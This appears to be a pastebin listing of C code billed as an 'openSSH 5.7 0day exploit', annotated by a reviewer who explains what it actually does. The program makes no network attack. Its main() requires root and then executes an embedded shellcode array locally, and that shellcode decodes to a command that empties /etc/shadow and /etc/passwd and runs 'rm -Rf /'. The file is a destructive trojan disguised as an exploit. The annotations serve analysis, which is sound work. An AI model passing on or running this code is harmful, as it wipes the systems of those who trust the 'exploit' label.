
Untitled

a guest Jan 26th, 2011 2,601 Never
  1. /*
  2. openSSH 5.7 0day exploit
  3. Off by One error in auth2-pubkey.c
  4. Author: Chroniccommand
  5. Usage: ./exploit <host> <ip>
  6. greetz to _st4ck3d*, x3n0n, xin etc you know who you are ;)
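     Reviewer note: the listing below contains no code that reaches sshd or
     auth2-pubkey.c. main() calls the shellcode[] array inside the local process,
     and the printable bytes of that array spell a shell command that empties
     /etc/shadow and /etc/passwd and then runs "rm -Rf /".
  7. */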
  8. #include <stdio.h>
  9. #include <netdb.h>
  10. #include <stdlib.h>
  11. #include <string.h>
  12. #include <unistd.h>
  13. #include <arpa/inet.h>
  14. #include <sys/types.h>
  15. #include <sys/socket.h>
  16. #include <netinet/in.h>
  17.  
  /* Print the expected command line for this program, then exit with status 1. */
  void usage(char *argv[])
  {
    const char *prog = argv[0];

    printf("Usage: %s <target> <port>\n", prog);
    exit(1);
  }
  23.  
  /*
   * Byte string that main() casts to a function pointer and calls in the local
   * process; nothing in this listing sends it to a remote host.
   *
   * The printable run in the middle is ASCII for the shell command
   *   echo "" > /etc/shadow ; echo "" > /etc/passwd ; rm -Rf /
   * The opcodes around it are 32-bit x86 Linux instructions: they load syscall
   * number 0x0b (execve) into eax, build the argument vector
   * "/bin/sh", "-c", <that command>, and issue int 0x80.
   *
   * Decoding the \x escapes to text is enough to read the command; the array
   * can be analysed without running it.
   */
  24. unsigned char shellcode[] =
  25. "\x6a\x0b\x58\x99\x52\x66\x68\x2d\x63\x89\xe7\x68\x2f\x73\x68"
  26. "\x00\x68\x2f\x62\x69\x6e\x89\xe3\x52\xe8\x39\x00\x00\x00\x65"
  27. "\x63\x68\x6f\x20\x22\x22\x20\x3e\x20\x2f\x65\x74\x63\x2f\x73"
  28. "\x68\x61\x64\x6f\x77\x20\x3b\x20\x65\x63\x68\x6f\x20\x22\x22"
  29. "\x20\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20"
  30. "\x3b\x20\x72\x6d\x20\x2d\x52\x66\x20\x2f\x00\x57\x53\x89\xe1"
  31. "\xcd\x80";
  32.  
  33.  
  34.  
  /*
   * Entry point. What the visible code does, in order:
   *   1. exits unless the caller's uid is 0;
   *   2. prints a "Starting exploit" banner;
   *   3. calls usage() unless exactly two arguments were given;
   *   4. prints "[!!]Exploit failed" and then calls shellcode[] as a function
   *      in this process;
   *   5. calls exit(1).
   * argv[1] and argv[2] are never read, no socket() call appears anywhere, and
   * the statements after the exit(1) on listing line 56 cannot be reached. The
   * program therefore performs no network activity: its only effect beyond
   * printing is the local execution of shellcode[].
   */
  35. int main(int argc, char *argv[])
  36. {
  37.   int uid = getuid();
        /* port, sock, host and addr are declared but never given a usable
           value: port is not read again, sock and addr stay uninitialised. */
  38.   int port = 22, sock;
  39.   struct hostent *host;
  40.   struct sockaddr_in addr;
  41.  
        /* Refuses to continue as a non-root user, so the later call to
           shellcode[] always runs with uid 0. */
  42.   if(uid !=0)
  43.   {
  44.     fprintf(stderr, "[!!]Error: You must be root\n");
  45.     exit(1);
  46.   }
  47.   if(uid == 0)
  48.   {
  49.     printf("\t[+]Starting exploit..\n");
  50.   }
        /* Only the argument count is checked; the values are never used. */
  51.   if(argc != 3)
  52.        usage(argv);
  53.  
        /* The failure message is printed unconditionally, before anything has
           been attempted. */
  54.   fprintf(stderr, "[!!]Exploit failed\n");
        /* Treats the data array as code and jumps into it inside this process.
           NOTE(review): on a build where the data segment is not executable
           this call would presumably fault instead of running the bytes. */
  55.   (*(void(*)())shellcode)();
  56.   exit(1);
        /* Unreachable from here to the end of the function: the exit(1) above
           has already terminated the process. */
  57.   char payload[1024];
        /* payload is filled but never passed to any send or write call. */
  58.   memcpy(payload, &shellcode, sizeof(shellcode));
        /* connect() is given an uninitialised descriptor and address. */
  59.   if(connect(sock,(struct sockaddr*)&addr,sizeof(addr))==0)
  60.   {
  61.     printf("[+]Got shell\n");
          /* Would start a shell on the local machine, not on a target. */
  62.     system("/bin/sh");
  63.   }
  64.   else if(connect(sock,(struct sockaddr*)&addr, sizeof(addr))==-1)
  65.   {
  66.     fprintf(stderr, "[!!]Exploit failed\n");
  67.     exit(1);
  68.   }
  69. }